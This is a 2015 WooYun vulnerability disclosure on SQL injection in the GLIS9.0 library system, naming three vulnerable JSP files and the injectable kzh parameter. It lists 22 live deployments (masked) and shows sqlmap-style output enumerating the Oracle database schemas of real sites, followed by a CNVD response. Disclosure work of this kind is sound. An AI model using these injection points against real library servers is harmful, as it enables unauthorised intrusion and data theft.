当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132188

漏洞标题:通用图书馆集成系统GLIS9.0高危注入

相关厂商:北京清大新洋科技有限公司

漏洞作者: 路人甲

提交时间:2015-08-14 17:21

修复时间:2015-11-12 12:28

公开时间:2015-11-12 12:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-17: 细节向第三方安全合作伙伴开放
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

RT

详细说明:

厂商:北京清大新洋科技有限公司
官网:http://**.**.**.**/
用户:http://**.**.**.**/yonghu.html


这系统卖的挺贵的啊,看产品报价:http://**.**.**.**/cp/glis90.html

产品名称:通用图书馆集成系统GLIS9.0
市场价格:198000元(FOR WIN)、228000元(FOR UNIX)
代理价格:138600元(FOR WIN)、159600元(FOR UNIX)
其它:以上报价为基本版,每增加一个用户加5000元。


每次提洞在wooyun先看前辈的洞,然后接着挖
http://**.**.**.**/bugs/wooyun-2010-099335
http://**.**.**.**/bugs/wooyun-2014-079840
http://**.**.**.**/bugs/wooyun-2010-085319
http://**.**.**.**/bugs/wooyun-2010-082667
看到用户还是有点哆嗦的。。。看截图

client.png


因为案例较多,随便一搜就很多:
这里来一些(22个):

http://**.**.**.**:8000/opac/
http://**.**.**.**/opac/
**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
http://**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
http://**.**.**.**:8000/opac/
**.**.**.**:8070/opac/
**.**.**.**/opac/
http://**.**.**.**:8070/
**.**.**.**:8086/opac/
**.**.**.**:8088/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8080/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/


下面就闲话少说,看洞:
注入一:

文件:xskp.jsp
POST参数kzh存在注入


注入二:

文件:ckmarc.jsp
POST参数kzh存在注入


注入三:

文件:eaaldetail.jsp
参数:kzh存在注入


上述三个洞均已排除前人提交的漏洞,无重复。每个注入拿两个案例证明
注入一、===========================================
案例1、

**.**.**.**:8088//opac/xskp.jsp
POST:
kzh=zyk0040640&dztm=&dctm=


0806_2.png

0806_2_1.png


数据信息(17个库):

web application technology: JSP
back-end DBMS: Oracle
[18:13:30] [INFO] fetching current user
[18:13:30] [WARNING] reflective value(s) found and filtering ou
current user: 'USRGLIS'
[18:13:30] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:13:30] [WARNING] schema names are going to be used on Oracl
as the counterpart to database names on other DBMSes
[18:13:30] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSG
[*] TSMSYS
[*] USRGLIS
[*] WMSYS
[*] XDB


案例2、

**.**.**.**:8080/opac/xskp.jsp
POST:kzh=zyk0040640&dztm=&dctm=


0806_2_2.png


注入二、===========================================
案例1、

**.**.**.**:8088//opac/ckmarc.jsp
POST:
kzh=zyk0040640


0806_3.png


案例2、

**.**.**.**:8080/opac/ckmarc.jsp
POST:kzh=zyk0040640


0806_3_1.png


数据库信息:

web application technology: JSP
back-end DBMS: Oracle
[18:36:49] [INFO] fetching current user
current user: 'USRGLIS'
[18:36:49] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:36:49] [WARNING] schema names are going to be used on Oracle
as the counterpart to database names on other DBMSes
[18:36:49] [INFO] fetching database (schema) names
[18:36:51] [INFO] the SQL query used returns 9 entries
[18:36:51] [INFO] starting 5 threads
[18:36:52] [INFO] retrieved: "EXFSYS"
[18:36:52] [INFO] retrieved: "APEX_030200"
[18:36:52] [INFO] retrieved: "MDSYS"
[18:36:52] [INFO] retrieved: "CTXSYS"
[18:36:52] [INFO] retrieved: "OLAPSYS"
[18:36:55] [INFO] retrieved: "SYSTEM"
[18:36:55] [INFO] retrieved: "XDB"
[18:36:55] [INFO] retrieved: "USRGLIS"
[18:36:55] [INFO] retrieved: "SYS"
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] USRGLIS
[*] XDB


注入三、===========================================
案例1、

**.**.**.**:8088//opac/eaal/eaaldetail.jsp?kzh=zyk0040640


0806_7.png


看看用户和库

0806_7_1.png


案例2、

**.**.**.**/opac/eaal/eaaldetail.jsp?kzh=zyk0040640


0806_7_6.png


案例3、

**.**.**.**:8080/opac/eaal/eaaldetail.jsp?kzh=zyk0040640


0806_7_3.png


数据库:

0806_7_4.png

漏洞证明:

已证明

修复方案:

过滤+升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-14 12:26

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无